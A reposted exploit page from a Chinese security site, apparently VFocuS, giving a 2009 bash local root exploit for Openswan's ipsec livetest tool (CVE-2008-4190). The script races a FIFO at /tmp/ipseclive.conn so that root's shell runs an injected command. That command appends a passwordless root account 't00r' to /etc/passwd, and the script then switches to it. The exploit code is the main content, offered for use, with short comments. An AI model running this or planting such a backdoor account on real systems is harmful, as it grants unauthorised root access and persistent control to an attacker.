首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Openswan <= 2.4.12/2.6.16 Insecure Temp File Creation Root Exploit
来源:www.vfcocus.net 作者:nofame 发布时间:2009-07-14  
#!/bin/bash
# uglyswan - OpenSwan local root exploit (CVE-2008-4190)
#
# description:
# The IPSEC livetest tool in Openswan 2.4.12 and earlier, and 2.6.x through 2.6.16,
# allows local users to overwrite arbitrary files and execute arbitrary code via a
# symlink attack on the (1) ipseclive.conn and (2) ipsec.olts.remote.log temporary files.
# NOTE: in many distributions and the upstream version, this tool has been disabled.
#
# vulnerable code:
# wget -o /dev/null  -O /tmp/ipseclive.conn "http://192.168.0.1/olts/?leftid=$leftid&$leftrsasigkey&version=$version"
# sh < /tmp/ipseclive.conn
#
# the exploit:
# cat waits for the input from wget to the fifo and after it received it, you
# immediately echo your command into the fifo which was empty again and viola, it
# gets executed, because the sh binary needs a few milliseconds to get loaded,
# it's a typical race condition.
#
# problem:
# you need to trick root to execute "ipsec livetest", and this script needs to run in background...
#
# I don't want no fame for this as it is ripped from Gentoo bug 238574, thanks
#

mkfifo /tmp/ipseclive.conn
cat /tmp/ipseclive.conn
echo 'echo t00r::0:0::/tmp:/bin/sh>>/etc/passwd' > /tmp/ipseclive.conn
rm /tmp/ipseclive.conn
su -l t00r

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeBSD 6/8 (ata device) Local
·Mp3-Nator 2.0 (ListData.dat) U
·ScITE Editor 1.72 Local Crash
·Mozilla Firefox 3.5 Remote Buf
·RunCMS <= 1.6.3 (double ext) R
·FotoFlexer suffers from a remo
·Tandberg MXP F7.0 (USER) Remot
·HTMLDOC <= 1.8.27 Bufferoverfl
·JetAudio 7.5.3 COWON Media Cen
·Icarus 2.0 (.ICP File) Local S
·Photo DVD Maker Pro versions 8
·Live For Speed 2 Version Z .Mp
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved